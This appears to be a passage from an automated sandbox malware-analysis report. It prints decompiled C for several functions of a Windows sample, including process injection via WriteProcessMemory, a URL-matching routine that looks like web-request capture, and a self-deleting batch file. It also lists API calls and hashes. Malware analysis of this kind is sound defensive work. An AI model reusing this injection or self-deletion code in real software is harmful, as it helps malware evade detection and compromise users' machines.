									} else {
										_t70 = _t69 - 6;
										__eflags = _t70;
										if(_t70 == 0) {
											L19:
											_v28.x = _t78;
										} else {
											_t71 = _t70 - 1;
											__eflags = _t71;
											if(_t71 == 0) {
												L17:
												_v20 = _t78;
											} else {
												__eflags = _t71 == 1;
												if(_t71 == 1) {
													L22:
													_v28.y = _t73;
												}
											}
										}
									}
								}
							}
						}
					} else {
						_t81 =  *((intOrPtr*)(_t80 + 0x10));
						_t79 = _t78 -  *((intOrPtr*)(_t81 + 0x100));
						_t74 = _t73 -  *((intOrPtr*)(_t81 + 0x104));
						_v28.x = _v28.x + _t79;
						_v28.y = _v28.y + _t74;
						_v20 = _v20 + _t79;
						_v16 = _v16 + _t74;
					}
					_t50 = IsRectEmpty( &_v28);
					if(_t50 == 0) {
						if((GetWindowLongW(_v8, 0xfffffff0) & 0x40000000) != 0) {
							MapWindowPoints(0, GetParent(_v8),  &_v28, 2);
						}
						return SetWindowPos(_v8, 0, _v28.x, _v28.y, _v20 - _v28, _v16 - _v28.y, 0x630c);
					}
				}
				return _t50;
			}

0x004082c7
0x004082ce
0x004082d0
0x004082d2
0x004082d8
0x004082eb
0x004082ee
0x004082f1
0x004082fe
0x00408306
0x00408311
0x00408330
0x00408334
0x00408337
0x00408355
0x00408355
0x00408358
0x00408378
0x00000000
0x0040835a
0x0040835a
0x0040835a
0x0040835b
0x00408373
0x0040835d
0x0040835d
0x0040835d
0x0040835e
0x0040836b
0x00000000
0x00408360
0x00408360
0x00408361
0x00000000
0x00000000
0x00408361
0x0040835e
0x0040835b
0x00408339
0x00408339
0x00408350
0x00408350
0x00000000
0x0040833b
0x0040833c
0x0040833c
0x0040833d
0x00000000
0x0040833f
0x00408340
0x00408340
0x00408341
0x00408363
0x00408363
0x00000000
0x00408343
0x00408343
0x00408343
0x00408346
0x0040836e
0x0040836e
0x00408348
0x00408348
0x00408348
0x00408349
0x00408366
0x00408366
0x0040834b
0x0040834b
0x0040834c
0x0040837b
0x0040837b
0x0040837b
0x0040834c
0x00408349
0x00408346
0x00408341
0x0040833d
0x00408339
0x00408313
0x00408313
0x00408316
0x0040831c
0x00408322
0x00408325
0x00408328
0x0040832b
0x0040832b
0x00408382
0x0040838a
0x0040839c
0x004083b0
0x004083b0
0x00000000
0x004083d4
0x0040838a
0x004083de

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 004082D2
ReleaseMutex.KERNEL32(?), ref: 004082F1
GetWindowRect.USER32 ref: 004082FE
IsRectEmpty.USER32(?), ref: 00408382
GetWindowLongW.USER32(?,000000F0), ref: 00408391
GetParent.USER32(?), ref: 004083A7
MapWindowPoints.USER32 ref: 004083B0
SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 004083D4

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$EmptyLongMutexObjectParentPointsReleaseSingleWait
String ID:
API String ID: 2634726239-0
Opcode ID: 4f9a52798173db80d21501c166ca2291fee5fe9989a33a06982ac7aea1bef415
Instruction ID: ec5075b8e71b28687eaca58ad83e0569e128089b81a41065efbf6232d05234c9
Opcode Fuzzy Hash: 4f9a52798173db80d21501c166ca2291fee5fe9989a33a06982ac7aea1bef415
Instruction Fuzzy Hash: 2A41607180060ADFCB208FA8CA499BFBBB4FB84B50F14057EE981F22A0DB759940CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00418A36, Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 395
networkCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00418A36(intOrPtr _a4) {
				char _v9;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v32;
				char _v36;
				char _v60;
				char _v72;
				signed int _v76;
				char* _v80;
				void* _v96;
				intOrPtr _v148;
				void* _v160;
				char _v168;
				char _v272;
				char _v536;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t128;
				intOrPtr* _t129;
				char* _t130;
				void* _t137;
				void* _t140;
				void* _t144;
				void* _t152;
				void* _t154;
				char* _t156;
				void* _t161;
				void* _t163;
				void* _t164;
				void* _t167;
				void* _t172;
				intOrPtr _t174;
				intOrPtr* _t176;
				void* _t177;
				void* _t182;
				intOrPtr _t186;
				intOrPtr _t187;
				signed int _t189;
				void* _t194;
				void* _t197;
				void* _t198;
				void* _t199;
				int _t204;
				void* _t207;
				signed int _t210;
				void* _t214;
				signed int _t217;
				signed int _t218;
				void* _t219;
				void* _t224;
				char* _t227;
				intOrPtr _t228;
				char* _t233;
				char* _t236;
				intOrPtr _t238;
				signed int _t239;
				intOrPtr _t240;
				void* _t244;
				void* _t247;

				_t217 = 0;
				_v16 = 0;
				_v9 = 0xff;
				EnterCriticalSection(0x423c6c);
				_t225 =  *0x423c88;
				if( *0x423c88 == 0 ||  *0x423c84 == 0) {
					_t240 = _a4;
				} else {
					_t240 = _a4;
					_t230 = 0;
					if(E0041816B(_t225, 0,  *(_t240 + 8),  *(_t240 + 0xc)) != 0) {
						_t210 = E00419EBD();
						_v20 = _t210;
						if(_t210 != 0) {
							_t214 = E00418225(0, 4,  &_v20,  *0x423c84);
							_push(_v20);
							if(_t214 == 0) {
								E004119C1();
							}
							E00419F28(_t225);
						}
						E004119C1( *0x423c84);
						E004119C1( *0x423c88);
						 *0x423c84 = _t217;
						 *0x423c88 = _t217;
					}
				}
				LeaveCriticalSection(0x423c6c);
				_t128 =  *((intOrPtr*)(_t240 + 0x40));
				_t254 = _t128 - _t217;
				if(_t128 == _t217) {
					L38:
					if((_v16 & 0x00000001) == 0) {
						_t187 =  *((intOrPtr*)(_t240 + 0x44));
						_t272 = _t187 - _t217;
						if(_t187 != _t217 && E00418426(_t225, _t230, _t272, 3, _t187,  *(_t240 + 8),  *(_t240 + 0xc), _t217) != 0) {
							_v16 = _v16 | 0x00000001;
						}
					}
					if( *(_t240 + 0x20) >= 0x21) {
						_t182 = 0x10;
						E00419D9D(_t182,  &_v72);
						_t238 =  *((intOrPtr*)(_t240 + 0x1c));
						if(E00411A32( &_v72, _t238, 0x21) == 0) {
							_t186 =  *((intOrPtr*)(_t238 + 0x21));
							if(_t186 == 0x3b || _t186 == 0) {
								_v16 = _v16 | 0x00000010;
							}
						}
					}
					_t129 =  *((intOrPtr*)(_t240 + 0x2c));
					_v24 = _t217;
					if(_t129 == _t217 ||  *_t129 == _t217) {
						L52:
						_t130 =  *((intOrPtr*)(_t240 + 0x34));
						__eflags = _t130 - _t217;
						if(_t130 == _t217) {
							goto L60;
						}
						__eflags =  *_t130;
						if( *_t130 == 0) {
							goto L60;
						}
						_t167 = 0x12;
						E00419DD3(_t167,  &_v168);
						_t172 = E0041272F( &_v24,  &_v168,  *((intOrPtr*)(_a4 + 0x34)));
						_t247 = _t247 + 0xc;
						goto L55;
					} else {
						_t176 =  *((intOrPtr*)(_t240 + 0x30));
						if(_t176 == _t217 ||  *_t176 == _t217) {
							goto L52;
						} else {
							_t177 = 0x11;
							E00419DD3(_t177,  &_v272);
							_push( *((intOrPtr*)(_a4 + 0x30)));
							_t172 = E0041272F( &_v24,  &_v272,  *((intOrPtr*)(_a4 + 0x2c)));
							_t247 = _t247 + 0x10;
							L55:
							if(_t172 > _t217) {
								_t174 = E00412D70(_v24, _t172 + _t172);
								if( *0x423c8c != _t174) {
									_t64 =  &_v16;
									 *_t64 = _v16 | 0x00000020;
									__eflags =  *_t64;
									 *0x423c8c = _t174;
								} else {
									E004119C1(_v24);
									_v24 = _t217;
								}
							}
							_t240 = _a4;
							L60:
							if(_v9 != 0xff) {
								__eflags = _v9 - 1;
								if(_v9 != 1) {
									L67:
									if((_v16 & 0x00000008) == 0) {
										L93:
										E004119C1(_v24);
										_t218 = _v16;
										if((_t218 & 0x00000001) == 0) {
											if(E0041848E(_t230, _t240) != 0) {
												_t218 = _t218 | 0x00000002;
											}
											if((_t218 & 0x00000010) != 0 && E00418848(_t240, _t230) != 0) {
												_t218 = _t218 | 0x00000004;
											}
										}
										return _t218;
									}
									_t136 =  *(_t240 + 0x28);
									_t219 = 0;
									if( *(_t240 + 0x28) != 0) {
										__eflags = _v16 & 0x00000010;
										if((_v16 & 0x00000010) == 0) {
											__eflags =  *(_t240 + 0x20);
											if( *(_t240 + 0x20) != 0) {
												L92:
												_v16 = _v16 & 0xfffffff7;
												goto L93;
											}
											_t233 =  &_v36;
											_t137 = 0xc;
											E00419D9D(_t137, _t233);
											_push(_t233);
											_push(9);
											L81:
											_pop(_t140);
											_v20 = E00411E1F(_t140);
											L82:
											if(_v20 == 0) {
												goto L92;
											}
											E0041D15D( &_v32);
											_t144 = E00411C01( *(_t240 + 0xc), 0,  *(_t240 + 8));
											_t235 = _t144;
											if(_t144 != 0) {
												_t230 = 0x3c;
												E00411A74( &_v160,  &_v160, 0, _t230);
												_v160 = _t230;
												if(InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v160) == 1) {
													_t152 = 0xa;
													E00419DD3(_t152,  &_v272);
													_t154 = 0xd;
													E00419DD3(_t154,  &_v60);
													_t227 =  *(_a4 + 0x10);
													_t156 = 0x403490;
													_t230 =  ==  ? 0x403490 : _v24;
													_t244 =  ==  ? 0x403490 : _v32;
													if(_t227 == 0) {
														_t227 = "-";
													}
													if((_v16 & 0x00000001) != 0) {
														_t156 =  &_v60;
													}
													_push(_v20);
													_push(_t230);
													_push(_t244);
													_push(_t227);
													_push(_t156);
													_t161 = E0040BA61(_t227, _t230, (0 | _v148 == 0x00000004) + 0xb, (0 | _v148 == 0x00000004) + 0xb, _t235, 0,  &_v272, _t235);
													_t240 = _a4;
													_t219 = _t161;
												}
												E004119C1(_t235);
											}
											E004119C1(_v32);
											E004119C1(_v20);
											if(_t219 != 0) {
												goto L93;
											} else {
												goto L92;
											}
										}
										_t230 = E00411E1F(_t136,  *((intOrPtr*)(_t240 + 0x24)));
										_v20 = _t230;
										__eflags = _t230;
										if(_t230 == 0) {
											goto L92;
										}
										_t163 = 0;
										__eflags =  *(_t240 + 0x28);
										if( *(_t240 + 0x28) <= 0) {
											goto L82;
										} else {
											goto L73;
										}
										do {
											L73:
											_t228 =  *((intOrPtr*)(_t163 + _t230));
											__eflags = _t228 - 0x26;
											if(_t228 != 0x26) {
												__eflags = _t228 - 0x2b;
												if(_t228 == 0x2b) {
													 *((char*)(_t163 + _t230)) = 0x20;
												}
											} else {
												 *((char*)(_t163 + _t230)) = 0xa;
											}
											_t163 = _t163 + 1;
											__eflags = _t163 -  *(_t240 + 0x28);
										} while (_t163 <  *(_t240 + 0x28));
										goto L82;
									}
									_t236 =  &_v36;
									_t164 = 0xb;
									E00419D9D(_t164, _t236);
									_push(_t236);
									_push(7);
									goto L81;
								}
								L66:
								_v16 = _v16 | 0x00000008;
								goto L67;
							}
							if( *((char*)(_t240 + 0x18)) != 1 ||  *(_t240 + 0x28) <= _t217) {
								if((_v16 & 0x00000020) == 0) {
									goto L67;
								}
							}
							goto L66;
						}
					}
				}
				_t189 = E0041752D( &_v32, _t230, _t254, _t128, 0x4e25, 0x10000000);
				_t225 = _v32;
				_v20 = _t189;
				if(E00412853(_t189, _v32) == 0) {
					L37:
					E004119C1(_v20);
					_t217 = 0;
					goto L38;
				} else {
					_t239 = _v20;
					do {
						_t225 = _t239 + 1;
						if( *_t225 == 0) {
							goto L36;
						}
						_t194 =  *_t239;
						if(_t194 == 0x21) {
							L22:
							_t239 = _t225;
							L23:
							_t230 = 0;
							_t225 = _t239;
							if(E0041816B(_t239, 0,  *(_t240 + 8),  *(_t240 + 0xc)) == 0) {
								goto L36;
							}
							_t197 = _t224;
							if(_t197 == 0) {
								_v9 = 0;
								L35:
								if(_t224 != 2) {
									goto L37;
								}
								goto L36;
							}
							_t198 = _t197 - 1;
							if(_t198 == 0) {
								L30:
								_v9 = 1;
								goto L35;
							}
							_t199 = _t198 - 1;
							if(_t199 == 0) {
								_t230 = 0x3c;
								E00411A74( &_v96,  &_v96, 0, 0);
								_v80 =  &_v536;
								_v96 = 0;
								_v76 = 0x103;
								_t204 = InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v96);
								__eflags = _t204 - 1;
								if(_t204 == 1) {
									__eflags = _v76;
									if(_v76 > 0) {
										E0041D117( &_v536);
									}
								}
								goto L35;
							}
							_t207 = _t199 - 1;
							if(_t207 == 0 || _t207 == 1) {
								_v16 = _v16 | 0x00000001;
								goto L30;
							} else {
								goto L35;
							}
						}
						if(_t194 == 0x2d) {
							goto L22;
						}
						if(_t194 == 0x40) {
							goto L22;
						}
						if(_t194 == 0x5e) {
							_t224 = 4;
							goto L22;
						} else {
							_t224 = 0;
							goto L23;
						}
						L36:
						_t239 = E00412891(_t239, 1);
					} while (_t239 != 0);
					goto L37;
				}
			}

0x00418a47
0x00418a4a
0x00418a4d
0x00418a51
0x00418a57
0x00418a5f
0x00418ad0
0x00418a69
0x00418a69
0x00418a6f
0x00418a7b
0x00418a7d
0x00418a82
0x00418a87
0x00418a95
0x00418a9a
0x00418a9f
0x00418aa1
0x00418aa6
0x00418aa7
0x00418aa7
0x00418ab2
0x00418abd
0x00418ac2
0x00418ac8
0x00418ac8
0x00418a7b
0x00418ad4
0x00418ada
0x00418add
0x00418adf
0x00418be4
0x00418be8
0x00418bea
0x00418bed
0x00418bef
0x00418c04
0x00418c04
0x00418bef
0x00418c0c
0x00418c13
0x00418c14
0x00418c19
0x00418c2a
0x00418c2c
0x00418c31
0x00418c37
0x00418c37
0x00418c31
0x00418c2a
0x00418c3b
0x00418c3e
0x00418c43
0x00418c7e
0x00418c7e
0x00418c81
0x00418c83
0x00000000
0x00000000
0x00418c85
0x00418c88
0x00000000
0x00000000
0x00418c92
0x00418c93
0x00418ca5
0x00418caa
0x00000000
0x00418c4a
0x00418c4a
0x00418c4f
0x00000000
0x00418c56
0x00418c5e
0x00418c5f
0x00418c67
0x00418c74
0x00418c79
0x00418cad
0x00418caf
0x00418cb7
0x00418cc2
0x00418cd1
0x00418cd1
0x00418cd1
0x00418cd5
0x00418cc4
0x00418cc7
0x00418ccc
0x00418ccc
0x00418cc2
0x00418cda
0x00418cdd
0x00418ce1
0x00418cf6
0x00418cfa
0x00418d00
0x00418d04
0x00418e77
0x00418e7a
0x00418e7f
0x00418e85
0x00418e8f
0x00418e91
0x00418e91
0x00418e97
0x00418ea4
0x00418ea4
0x00418e97
0x00418ead
0x00418ead
0x00418d0a
0x00418d0d
0x00418d11
0x00418d25
0x00418d29
0x00418d66
0x00418d6a
0x00418e73
0x00418e73
0x00000000
0x00418e73
0x00418d72
0x00418d75
0x00418d76
0x00418d7d
0x00418d7e
0x00418d80
0x00418d80
0x00418d86
0x00418d89
0x00418d8d
0x00000000
0x00000000
0x00418d96
0x00418da3
0x00418da8
0x00418dac
0x00418db4
0x00418dbf
0x00418dd0
0x00418de2
0x00418dec
0x00418ded
0x00418df7
0x00418df8
0x00418e06
0x00418e0b
0x00418e10
0x00418e15
0x00418e1a
0x00418e1c
0x00418e1c
0x00418e25
0x00418e27
0x00418e27
0x00418e2a
0x00418e2d
0x00418e2e
0x00418e2f
0x00418e30
0x00418e4c
0x00418e51
0x00418e57
0x00418e57
0x00418e5a
0x00418e5a
0x00418e62
0x00418e6a
0x00418e71
0x00000000
0x00000000
0x00000000
0x00000000
0x00418e71
0x00418d33
0x00418d35
0x00418d38
0x00418d3a
0x00000000
0x00000000
0x00418d40
0x00418d42
0x00418d45
0x00000000
0x00000000
0x00000000
0x00000000
0x00418d47
0x00418d47
0x00418d47
0x00418d4a
0x00418d4d
0x00418d55
0x00418d58
0x00418d5a
0x00418d5a
0x00418d4f
0x00418d4f
0x00418d4f
0x00418d5e
0x00418d5f
0x00418d5f
0x00000000
0x00418d64
0x00418d15
0x00418d18
0x00418d19
0x00418d20
0x00418d21
0x00000000
0x00418d21
0x00418cfc
0x00418cfc
0x00000000
0x00418cfc
0x00418ce7
0x00418cf2
0x00000000
0x00000000
0x00418cf4
0x00000000
0x00418ce7
0x00418c4f
0x00418c43
0x00418af3
0x00418af8
0x00418afb
0x00418b05
0x00418bda
0x00418bdd
0x00418be2
0x00000000
0x00418b0b
0x00418b0b
0x00418b0e
0x00418b0e
0x00418b14
0x00000000
0x00000000
0x00418b1a
0x00418b1e
0x00418b3e
0x00418b3e
0x00418b40
0x00418b43
0x00418b48
0x00418b51
0x00000000
0x00000000
0x00418b56
0x00418b59
0x00418bbe
0x00418bc2
0x00418bc5
0x00000000
0x00000000
0x00000000
0x00418bc5
0x00418b5b
0x00418b5c
0x00418b6b
0x00418b6b
0x00000000
0x00418b6b
0x00418b5e
0x00418b5f
0x00418b73
0x00418b7b
0x00418b86
0x00418b92
0x00418b98
0x00418b9f
0x00418ba5
0x00418ba8
0x00418baa
0x00418bae
0x00418bb7
0x00418bb7
0x00418bae
0x00000000
0x00418ba8
0x00418b61
0x00418b62
0x00418b67
0x00000000
0x00000000
0x00000000
0x00000000
0x00418b62
0x00418b22
0x00000000
0x00418b38
0x00418b26
0x00000000
0x00418b34
0x00418b2a
0x00418b30
0x00000000
0x00418b2c
0x00418b2c
0x00000000
0x00418b2c
0x00418bc7
0x00418bd0
0x00418bd2
0x00000000
0x00418b0e

APIs

EnterCriticalSection.KERNEL32(00423C6C,-00422A24,00000000,00422A08), ref: 00418A51
LeaveCriticalSection.KERNEL32(00423C6C), ref: 00418AD4
InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 00418B9F
InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 00418DD9

Part of subcall function 00419EBD: CreateMutexW.KERNEL32(00422568,00000000,00423E10,?,?,?,00405456), ref: 00419EE5

Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4

Strings

l<B, xrefs: 00418A42
, xrefs: 00418CEE

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CrackCriticalInternetSection$CreateEnterFreeHeapLeaveMutex
String ID: $l<B
API String ID: 4018265435-2187299703
Opcode ID: c02e658eb0cb0e327896a590a47dbdb3e29216e743d850eb6e3f0981638939b0
Instruction ID: 669cc296082537d21308f37a95843b351e459804bcf346d4df2b977e18b60845
Opcode Fuzzy Hash: c02e658eb0cb0e327896a590a47dbdb3e29216e743d850eb6e3f0981638939b0
Instruction Fuzzy Hash: 67D1BE71A00309AEDF219BA1C845BEFBBB5AF01344F04446FE951A72A1DB78ADC1CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00406388, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87
injectionCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00406388(void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4, void _a8) {
				char _v5;
				void _v12;
				intOrPtr _t25;
				void _t26;
				signed int _t29;
				void _t43;
				void* _t51;
				void* _t52;

				_t52 = __esi;
				_t51 = __edi;
				_t25 =  *0x422544; // 0x400000
				_t26 = E0041631A(_t25, __edi);
				_v12 = _t26;
				if(_t26 != 0) {
					_v5 = 0;
					if(DuplicateHandle(0xffffffff, _a4, __edi,  &_a4, 0, 0, 2) == 0) {
						_v5 = 1;
					}
					_t29 =  *0x422530; // 0x1
					_a8 = _a8 | _t29 & 0x00000014;
					_push(_t52);
					if(WriteProcessMemory(_t51, 0x422530 -  *0x422544 + _v12,  &_a8, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					if(WriteProcessMemory(_t51, 0x422544 -  *0x422544 + _v12,  &_v12, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					if(E00405B5B(0x4229f4, _t51, _v12,  *0x4229f4) == 0) {
						_v5 = _v5 + 1;
					}
					if(E00405B5B(0x4229f8, _t51, _v12,  *0x4229f8) == 0) {
						_v5 = _v5 + 1;
					}
					if(_v5 == 0) {
						_t43 = _v12;
					} else {
						VirtualFreeEx(_t51, _v12, 0, 0x8000);
						goto L1;
					}
				} else {
					L1:
					_t43 = 0;
				}
				return _t43;
			}

0x00406388
0x00406388
0x0040638d
0x00406394
0x0040639b
0x004063a0
0x004063b5
0x004063c2
0x004063c4
0x004063c4
0x004063c8
0x004063d0
0x004063d3
0x004063f5
0x004063f7
0x004063f7
0x00406416
0x00406418
0x00406418
0x00406431
0x00406433
0x00406433
0x0040644c
0x0040644e
0x0040644e
0x00406454
0x0040646b
0x00406456
0x00406460
0x00000000
0x00406460
0x004063a2
0x004063a2
0x004063a2
0x004063a2
0x00406470

APIs

Part of subcall function 0041631A: IsBadReadPtr.KERNEL32(00400000,?,00000000,?,00000000), ref: 00416336

DuplicateHandle.KERNEL32(000000FF,7519F560,00000000,7519F560,00000000,00000000,00000002,00000000,00000000,?,?,?,00419FBF,?,00000000,?), ref: 004063BA
WriteProcessMemory.KERNEL32(00000000,7519F560,?,00000004,00000000,?,?,?,?,00419FBF,?,00000000,?,?,0041A157,?), ref: 004063F1
WriteProcessMemory.KERNEL32(00000000,7519F560,7519F560,00000004,00000000,?,?,?,00419FBF,?,00000000,?,?,0041A157,?,?), ref: 00406411
VirtualFreeEx.KERNEL32(00000000,7519F560,00000000,00008000,00000000,7519F560,00000000,7519F560,?,?,00419FBF,?,00000000,?,?,0041A157), ref: 00406460

Strings

0%B, xrefs: 004063DB
D%B, xrefs: 004063FB

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryProcessWrite$DuplicateFreeHandleReadVirtual
String ID: 0%B$D%B
API String ID: 2215616122-1757350062
Opcode ID: 3787fb974981f2b70e3e0f55bf623ed7e5146db896bf8aa4e8c88e8ce1d1a38d
Instruction ID: 01a922300506ea6c5ab3b5131195605b11fba08655effd1393a200d93604b8a1
Opcode Fuzzy Hash: 3787fb974981f2b70e3e0f55bf623ed7e5146db896bf8aa4e8c88e8ce1d1a38d
Instruction Fuzzy Hash: 4F21B4B2604109BEDB059BA4DE80EAF7F78FB05348F4040A9FA02F2190D3759A569B28

Uniqueness

Uniqueness Score: -1.00%

Function 00413481, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00413481(void* __ebx, void* __edi, char _a4) {
				short _v24;
				intOrPtr _v28;
				char _v72;
				short _v592;
				char _v852;
				char _v1392;
				void* _t35;
				char _t56;

				if(E00416D3D(L"bat",  &_v592) == 0) {
					L7:
					return 0;
				}
				CharToOemW( &_v592,  &_v852);
				_push( &_v852);
				if(E00412785( &_a4, "@echo off\r\n%s\r\ndel /F \"%s\"\r\n", _a4) == 0xffffffff) {
					L6:
					E00416D1C( &_v592);
					goto L7;
				}
				_t35 = E00416B71( &_v592, _a4, _t31);
				E004119C1(_a4);
				if(_t35 == 0) {
					goto L6;
				}
				_push(__edi);
				_push( &_v592);
				if(E004126B4( &_v592, 0x10e,  &_v1392, L"/c \"%s\"") <= 0xffffffff || GetEnvironmentVariableW(L"ComSpec",  &_v592, 0x104) - 1 > 0x102) {
					goto L6;
				} else {
					_t56 = 0x44;
					E00411A74( &_v72,  &_v72, 0, _t56);
					_v24 = 0;
					_v72 = _t56;
					_v28 = 1;
					return E00413288( &_v592,  &_v1392, 0,  &_v72, 0) & 0xffffff00 | _t48 != 0x00000000;
				}
			}

0x0041349d
0x0041358f
0x00000000
0x0041358f
0x004134b1
0x004134bd
0x004134d5
0x00413583
0x0041358a
0x00000000
0x0041358a
0x004134e7
0x004134f1
0x004134f9
0x00000000
0x00000000
0x004134ff
0x00413506
0x00413522
0x00000000
0x00413543
0x00413545
0x0041354d
0x00413555
0x0041356d
0x00413570
0x00000000
0x0041357e

APIs

Part of subcall function 00416D3D: GetTempPathW.KERNEL32(000000F6,?), ref: 00416D54

CharToOemW.USER32 ref: 004134B1

Part of subcall function 00416B71: CreateFileW.KERNEL32(0041349B,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,00416DB0,0041349B,00000000,00000000,0041349B,?), ref: 00416B8B
Part of subcall function 00416B71: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00416DB0,0041349B,00000000,00000000,0041349B,?), ref: 00416BAE
Part of subcall function 00416B71: CloseHandle.KERNEL32(00000000,?,00416DB0,0041349B,00000000,00000000,0041349B,?), ref: 00416BBB

Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4

GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00413535

Strings

@echo off%sdel /F "%s", xrefs: 004134C4
bat, xrefs: 00413491
/c "%s", xrefs: 00413507
ComSpec, xrefs: 00413530

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CharCloseCreateEnvironmentFreeHandleHeapPathTempVariableWrite
String ID: /c "%s"$@echo off%sdel /F "%s"$ComSpec$bat
API String ID: 1639923935-3344086482
Opcode ID: 2a949d606d81404b6edebe0c01d2ad3e6a227870b73206377bd154142bd678df
Instruction ID: 580b86592ac0efda2edcca50b213219deb23159d4e27520885909aa01ebb0f50
Opcode Fuzzy Hash: 2a949d606d81404b6edebe0c01d2ad3e6a227870b73206377bd154142bd678df
Instruction Fuzzy Hash: DF21E1B19011087ADF10DFA5DC46FEE77BCEB04705F2045A7B608E20A1D6799BC98F68

Uniqueness

Uniqueness Score: -1.00%

Function 00407257, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 85
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407257(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				long _v12;
				void* _v16;
				char _v32;
				void _v360;
				short _v880;
				void* __edi;
				void* __esi;
				void* _t18;
				void* _t25;
				void* _t26;
				long _t39;
				void* _t42;
				void* _t44;
				long _t47;

				_t48 =  &_v32;
				_t18 = 0x2b;
				_v16 = __edx;
				_t44 = __ecx;
				E00419DD3(_t18,  &_v32);
				if(E00417246(_t48,  &_v880, _t44) == 0) {
					L11:
					return 1;
				}
				_t25 = CreateFileW( &_v880, 0x40000000, 1, 0, 2, 0x80, 0);
				_v8 = _t25;
				if(_t25 == 0xffffffff) {
					goto L11;
				}
				_t26 = 0x30;
				_t39 = 0;
				E00419D9D(_t26,  &_v360);
				_t9 =  &_v8; // 0x40723f
				if(WriteFile( *_t9,  &_v360, 0x146,  &_v12, 0) == 0 || _v12 != 0x146) {
					L9:
					FlushFileBuffers(_v8);
					CloseHandle(_v8);
					if(_t39 == 0) {
						E00416D1C( &_v880);
					}
					goto L11;
				} else {
					_t42 = _v16;
					if(_t42 == 0) {
						L7:
						_t39 = 1;
						goto L9;
					}
					_t47 = E004124FE(_t42);
					if(WriteFile(_v8, _t42, _t47,  &_v12, 0) == 0 || _v12 != _t47) {
						_t39 = 0;
						goto L9;
					} else {
						goto L7;
					}
				}
			}

0x00407264
0x00407267
0x00407268
0x0040726b
0x0040726d
0x00407283
0x00407339
0x0040733d
0x0040733d
0x004072a2
0x004072a8
0x004072ae
0x00000000
0x00000000
0x004072bd
0x004072be
0x004072c0
0x004072dd
0x004072e4
0x00407315
0x00407318
0x00407321
0x0040732a
0x00407333
0x00407333
0x00000000
0x004072eb
0x004072eb
0x004072f0
0x0040730f
0x0040730f
0x00000000
0x0040730f
0x004072f9
0x00407308
0x00407313
0x00000000
0x00000000
0x00000000
0x00000000
0x00407308

APIs

Part of subcall function 00417246: PathCombineW.SHLWAPI(00405D8B,00405D8B,?,00405D8B,?,?), ref: 00417265

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 004072A2
WriteFile.KERNEL32(?r@,?,00000146,?,00000000,00000000), ref: 004072E0
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407304
FlushFileBuffers.KERNEL32(?), ref: 00407318
CloseHandle.KERNEL32(?), ref: 00407321

Strings

?r@, xrefs: 004072DD

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Write$BuffersCloseCombineCreateFlushHandlePath
String ID: ?r@
API String ID: 2459967240-3148030299
Opcode ID: 50779079251e561cf9c7c8349911c5d865ba7c7cf1d13a1133d9eb47232162b2
